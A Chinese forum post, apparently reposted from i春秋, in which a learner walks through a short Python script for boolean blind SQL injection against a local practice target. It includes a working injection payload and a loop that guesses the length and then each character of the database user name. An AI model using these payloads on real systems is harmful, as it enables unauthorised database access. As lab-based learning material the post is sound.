本文轉自:i春秋論壇
前言:
最近在學python,做了個盲注的簡單的跑用戶的腳本,僅做個記錄。
sqmap也有不靈的時候,有時需要根據情況自寫腳本探測
正文:
本地用大表姐給的sql和php文件搭建了個布爾盲注的靶機
另外感謝大表姐的指導。
稍作解釋:
注入語句里用%s占位,等待在for循里面依次判斷長度
[AppleScript]
純文本查看 復制代碼
l
=
"' and length(user())=%s and '1'='1"
|
requests獲取頁面執行返回,find方法定位成功的頁面特征booooom
#find()方法對字符串的處理,如果匹配到,則返回索引,第幾位匹配到,若沒有匹配到,則返回-1,即返回一直為int型
[AppleScript]
純文本查看 復制代碼
|
1
2
3
4
5
6
7
8
|
for
i
in
range
(
1
,
20
)
:
sql
=
l % str
(
i
)
judge
1
=
requests.
get
(
url
% sql
,
headers
=
headers
,
timeout
=
60
)
#print(judge1.content)
if
judge
1.
content
.find
(
"Name:booooom"
)
!
=
-1
:
length
=
i
print
(
i
)
break
|
此處判斷得出長度為14
得出長度下一步來一位一位判斷字符,
先把字符集存在列表待取
[AppleScript]
純文本查看 復制代碼
check_data
=
list
(
'
1234567890
abcdefghijklmnopqrstuvwxyz@'
)
|
接下來的套路與判斷長度一樣 先在for循環里枚舉字符與數據做對比,if判斷對比一致則可以匹配到頁面特征booooom
最后一位一位判斷出數據庫用戶
一個一個猜庫名 表名和內容 ,是一樣的套路 有興趣的可以練練手。
本文由i春秋學院提供,原文地址:http://bbs.ichunqiu.com/thread-11673-1-1.html